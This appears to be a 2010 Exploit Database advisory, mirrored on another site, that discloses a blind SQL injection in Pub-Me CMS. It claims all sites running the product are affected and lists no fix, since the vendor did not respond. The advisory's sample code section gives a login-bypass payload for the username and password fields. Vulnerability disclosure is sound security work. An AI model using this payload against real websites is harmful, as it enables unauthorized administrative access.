Pub-Me CMS – Blind SQL Injection

• Exploit Database
• 38 阅读

• 作者： H4f
  日期： 2010-10-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15348/

• _______ _____ ___ 
   | | |||.'_|
   | |__| _|
   |___|___||__||__|
  
  Pub-Me CMS Blind SQL Injection Vulnerability
   
   Name:Pub-Me CMS
   Vendor:http://www.pub-me.com/
   Versions Affected: //unknown, all current affected - devel. homepage & 33 clients web pages
   Software Link: Not aviable, Demo can be requested by e-mail from vendor
   Found by:H4f, <Sec was born project, Anonymous submission>
   Contact: zotrob [at] gmail [dot] com
   Date:2010-10-25
   
  X. INDEX
   
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
  
   
  I. ABOUT THE APPLICATION
  ________________________
   
  Pub-Me Content Managment System is designed to make it possible for you to pay full 
  attention to the content without having to bother about technologies.
  
  II. DESCRIPTION
  _______________
   
  NOT properly sanitised form before being used
  in a SQL query.
   
   
  III. ANALYSIS
  _____________
   
  Summary:
   
  All Pub-Me based websites are vulnerable, any more/less trained monkey can reach admin panel. 
  ______________________
  
   
  IV. SAMPLE CODE
  _______________
   
  Blind SQL Injection
   
   Login> ' or 0=0 #
   Pass>' or 0=0 #
   
  V. FIX
  ______
   
  Vedor contacted, no reponse.